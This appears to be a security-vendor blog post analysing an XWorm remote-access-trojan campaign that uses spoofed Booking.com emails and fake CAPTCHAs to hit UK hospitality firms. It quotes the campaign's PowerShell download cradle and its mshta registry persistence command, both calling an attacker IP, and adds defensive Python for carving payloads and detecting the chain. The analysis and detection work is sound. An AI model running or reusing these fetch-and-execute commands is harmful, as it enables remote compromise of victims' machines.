XWorm Malware Targets United Kingdom’s Hospitality Sector
![XWorm Header](/_next/image?url=https%3A%2F%2Flive-forcepoint-drupal.pantheonsite.io%2Fsites%2Fdefault%2Ffiles%2F2024-12%2FXWorm%2520Header.jpg&w=2048&q=75)
Lydia McElligott
XWorm is a popular commodity malware available for purchase as a Malware-as-a-Service (MaaS) through darknet forums. This versatile malware functions primarily as a Remote Access Tool (RAT), allowing attackers to gain control over compromised systems. In addition to its RAT capabilities, XWorm often includes self-propagating features, enabling it to spread autonomously across networks.
X-Labs recently identified an email phishing campaign distributing XWorm malware that targets the hospitality sector in the United Kingdom.
Fig. 1 - XWorm attack chain
The initial infection vector is a phishing email with a spoofed sender, made to appear as though it was sent from Booking.com. The email contains a link to a malicious website.
Fig. 2 - XWorm phishing email
Clicking the link directs the user to hxxps://extraguestreview[.]com#3Vrn_OYy in their browser. From our analysis, this campaign appears to target only Windows systems.
Fig. 3 - Windows user message
For Windows users, the website displays a fake CAPTCHA message over a subtly visible background designed to mimic a legitimate Booking.com page.
Fig. 4 - Fake Windows CAPTCHA
Following the on-screen instructions to complete the CAPTCHA leads the user to open the Windows Run dialog with a keyboard shortcut (Win+R). The page then instructs the user to paste and execute a command, which triggers the next stage of the attack (see Fig. 6 below):
Fig. 5 - Windows run command window
Fig. 6 - Command executes next stage of the attack
- IEX (New-Object Net.WebClient).DownloadString('hxxp://92.255.57[.]155/1/1.png')
The IP address hosts an obfuscated, partially base64-encoded PowerShell script. The script runs 'ipconfig /flushdns' to clear the local DNS resolver cache, which removes the record of recently resolved names from the host; it does not interrupt connectivity, because names are simply resolved again on the next lookup. The script embeds two PE files, which serve as the XWorm payloads.
To evade detection, the first two bytes of each embedded PE file (the 'MZ' magic number) are removed from the base64-encoded data and re-inserted at runtime, so a static scan of the script never sees a recognisable executable header, while the decoded payloads are still loaded and run directly in memory without touching disk. To maintain persistence, the malware creates an autorun registry entry that causes it to reconnect to its command-and-control (C2) server after a reboot.
Fig. 7 - Script clears DNS cache
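The MZ-stripping trick described above is easy to undo once the base64 blobs are located. The following is an added example (not code from the original post or from X-Labs) of a small carver that scans a decoded script for long base64 literals, prepends the missing MZ bytes, and keeps only the blobs that then parse as a PE image, reporting machine type, section count, compile timestamp, whether the CLR header is set (a .NET binary) and the SHA256 for comparison against the IOCs. The script layout (blobs inside quoted PowerShell strings) and the sample PE bytes are constructed assumptions; real samples carry further obfuscation layers that must be peeled off before this step.

```python
import base64
import hashlib
import re
import struct
from datetime import datetime, timezone

MACHINE_NAMES = {0x014C: "I386", 0x8664: "AMD64", 0x01C4: "ARMNT", 0xAA64: "ARM64"}


def _build_minimal_pe(machine=0x014C, sections=3, timestamp=1733616000):
    """Constructed stand-in for a payload: DOS header, PE signature, COFF header
    and a PE32 optional header whose CLR directory is set (so it looks .NET).
    It is not a runnable executable; it only exercises the carving logic."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    opt_size = 0xE0
    coff = struct.pack("<HHIIIHH", machine, sections, timestamp, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                    # PE32 magic
    struct.pack_into("<I", opt, 92, 16)                      # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 14 * 8, 0x2008, 0x48)  # CLR runtime header directory
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


SAMPLE_PE = _build_minimal_pe()
SAMPLE_SHA256 = hashlib.sha256(SAMPLE_PE).hexdigest()
STRIPPED_BLOB = base64.b64encode(SAMPLE_PE[2:]).decode()  # "MZ" removed, as in the loader
DECOY_BLOB = base64.b64encode(b"A" * 90).decode()           # long base64 that is not a PE

# Assumed (constructed) script layout: blobs sit in quoted string literals.
SAMPLE_SCRIPT = (
    "ipconfig /flushdns\n"
    f"$p1 = '{STRIPPED_BLOB}'\n"
    f"$junk = '{DECOY_BLOB}'\n"
)

B64_LITERAL = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")


def restore_mz(data: bytes) -> bytes:
    """Put the DOS magic back unless the blob already carries it."""
    return data if data[:2] == b"MZ" else b"MZ" + data


def parse_pe(data: bytes):
    """Return header facts for a valid PE image, or None if it is not one."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    machine, nsections, ts, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    dotnet = False
    if opt_size >= 2 and opt + opt_size <= len(data):
        magic = struct.unpack_from("<H", data, opt)[0]
        # PE32 keeps NumberOfRvaAndSizes at +92 and the directories at +96;
        # PE32+ shifts both by 16. Directory 14 is the CLR runtime header.
        if magic in (0x10B, 0x20B):
            ndirs_off, dirs_off = (92, 96) if magic == 0x10B else (108, 112)
            if opt + dirs_off + 15 * 8 <= len(data):
                ndirs = struct.unpack_from("<I", data, opt + ndirs_off)[0]
                clr_rva = struct.unpack_from("<I", data, opt + dirs_off + 14 * 8)[0]
                dotnet = ndirs > 14 and clr_rva != 0
    return {
        "machine": MACHINE_NAMES.get(machine, hex(machine)),
        "sections": nsections,
        "compiled": datetime.fromtimestamp(ts, tz=timezone.utc).isoformat(),
        "dotnet": dotnet,
        "size": len(data),
        "sha256": hashlib.sha256(data).hexdigest(),
    }


def carve_payloads(script: str):
    """Find base64 literals, re-add the MZ bytes and keep those that parse as PE."""
    found = []
    for m in B64_LITERAL.finditer(script):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except ValueError:
            continue
        info = parse_pe(restore_mz(raw))
        if info is not None:
            info["offset"] = m.start()
            found.append(info)
    return found


if __name__ == "__main__":
    for payload in carve_payloads(SAMPLE_SCRIPT):
        print(payload)
```

Restoring the two bytes before hashing matters: a SHA256 of the stripped blob will not match the IOC hashes listed at the end of this post, because those are computed over the complete file.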
Embedded Payloads:
Runa.dll is a 32-bit .NET compiled executable, protected by Crypto Obfuscator, with a compile date of December 8, 2024. Analysis of the binary's strings provides insight into some of its functionality.
Fig. 8 - Runa.dll contents
Fig. 9 - Runa.dll binary string analysis
SharpHide.exe is a 32-bit .NET compiled executable, protected by Confuser, with a compile date of October 20, 2024. Its Main method implements persistence by adding a registry entry so that the loader runs again on each system restart.
Fig. 10 - SharpHide.exe executable
Fig. 11 - SharpHide.exe content analysis
The entry is written as the key's "(default)" value, with the following data:
- mshta vbscript:close(CreateObject("WScript.Shell").Run("mshta hxxp://92.255.57[.]155/1",0))
When the autorun entry fires, mshta.exe executes the inline VBScript, which uses WScript.Shell to start a second mshta.exe that fetches and executes the remote content in a hidden window (the trailing 0) and then closes the first instance. Nothing from the payload needs to exist on disk for the chain to restart.
Fig. 12 - Registry key
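Because the chain leaves little on disk, the practical detection points are the process and registry telemetry around the Run-dialog command (Fig. 6) and the mshta autorun entry above. The following is an added example (not code from the original post or from X-Labs) of three simple rules evaluated over a handful of constructed Sysmon-like records built from this post's IOCs: a script host spawned by explorer.exe (the parent of anything launched from Win+R) with a download cradle on its command line, an 'ipconfig /flushdns' spawned by a script host, and a Run key value that invokes mshta with inline script or a remote URL. The event shape, field names and the two benign control records are assumptions for the example.

```python
import re

# Constructed telemetry in a Sysmon-like shape, built from the IOCs in this post;
# these are not real event records from the campaign.
# EventID 1 = process creation, EventID 13 = registry value set.
SAMPLE_EVENTS = [
    {"EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell IEX (New-Object Net.WebClient).DownloadString('http://92.255.57.155/1/1.png')"},
    {"EventID": 1,
     "Image": r"C:\Windows\System32\ipconfig.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "ipconfig /flushdns"},
    {"EventID": 13,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\(Default)",
     "Details": 'mshta vbscript:close(CreateObject("WScript.Shell").Run("mshta http://92.255.57.155/1",0))'},
    # Benign controls: an admin running PowerShell from cmd, and OneDrive's own Run entry.
    {"EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell Get-Process"},
    {"EventID": 13,
     "Image": r"C:\Program Files\Microsoft OneDrive\OneDriveSetup.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r'"C:\Users\guest\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'},
]

SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe")
CRADLE = re.compile(r"downloadstring|downloadfile|\biex\b|invoke-expression|invoke-webrequest|https?://", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.I)
MSHTA_REMOTE = re.compile(r"mshta.*(vbscript:|javascript:|https?://)", re.I)
URL = re.compile(r"https?://[^\s'\")]+", re.I)


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _first_url(text: str):
    m = URL.search(text)
    return m.group(0) if m else None


def evaluate(events):
    """Run the three rules over a list of events and return one alert per hit."""
    alerts = []
    for i, ev in enumerate(events):
        if ev["EventID"] == 1:
            img, parent = _basename(ev["Image"]), _basename(ev["ParentImage"])
            # Win+R launches are children of explorer.exe; so are Start-menu launches,
            # which is why the cradle pattern is required as well.
            if parent == "explorer.exe" and img in SCRIPT_HOSTS and CRADLE.search(ev["CommandLine"]):
                alerts.append({"index": i, "rule": "run_dialog_download_cradle",
                               "ioc": _first_url(ev["CommandLine"])})
            elif img == "ipconfig.exe" and "/flushdns" in ev["CommandLine"].lower() and parent in SCRIPT_HOSTS:
                alerts.append({"index": i, "rule": "dns_cache_flush_from_script_host", "ioc": None})
        elif ev["EventID"] == 13:
            if RUN_KEY.search(ev["TargetObject"]) and MSHTA_REMOTE.search(ev["Details"]):
                alerts.append({"index": i, "rule": "run_key_mshta_remote_loader",
                               "ioc": _first_url(ev["Details"])})
    return alerts


if __name__ == "__main__":
    for alert in evaluate(SAMPLE_EVENTS):
        print(alert)
```

The flushdns rule is low confidence on its own (administrators run it routinely) and is worth keeping only as a correlating signal next to the other two; the Run-key rule is the one that survives a reboot, since the autorun value is the only durable artefact this chain leaves behind.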
Conclusion:
This delivery technique, a fake CAPTCHA that walks the victim through pasting a command into the Run dialog (commonly referred to as ClickFix), has gained significant traction in recent months. Attackers exploit users' tendency to click through verification prompts without reading them, and the attacks are proving highly effective. Because the user initiates the command themselves, it runs under their own account through signed, built-in Windows binaries (PowerShell and mshta, a "living off the land" approach), and the payloads are decoded and executed directly in memory, leaving few artefacts on disk. That makes the chain much harder to detect with file-based scanning alone; process and registry telemetry is where it shows.
Protection Statement:
- Stage 2 (Lure) – Delivered via malicious URL embedded in an email. Emails are blocked by Email Analytics
- Stage 3 (Malicious Website) – URLs hosting the PowerShell Scripts are blocked by Web Analytics and Real Time Security Analytics
- Stage 6 (Call Home) - The malware’s Command and Control server (C2) is blocked under Security Classification
IOCs:
- Lure website - hxxps://extraguestreview[.]com#3Vrn_OYy
- XWorm C2 - 92.255.57[.]155
- hxxp://92.255.57[.]155/Capcha.html
- hxxp://92.255.57[.]155/1/1.png
- hxxp://92.255.57[.]155/1/2.png
- Runa.dll, SHA256 6c327eec94240fa4d1b7141396a7a1e01d76120ab7fca9ae38e5202ce2e916f9
- SharpHide.exe, SHA256 ffac95298176d8441ae088c6d5e95b0892afa9768876d3c749404eb31d4b4b6a
Lydia McElligott is a Security Researcher with the Forcepoint X-Labs Threat Research team. She focuses on researching cyberattacks which target the web and email, particularly focusing on URL analysis, email security and malware campaign investigation.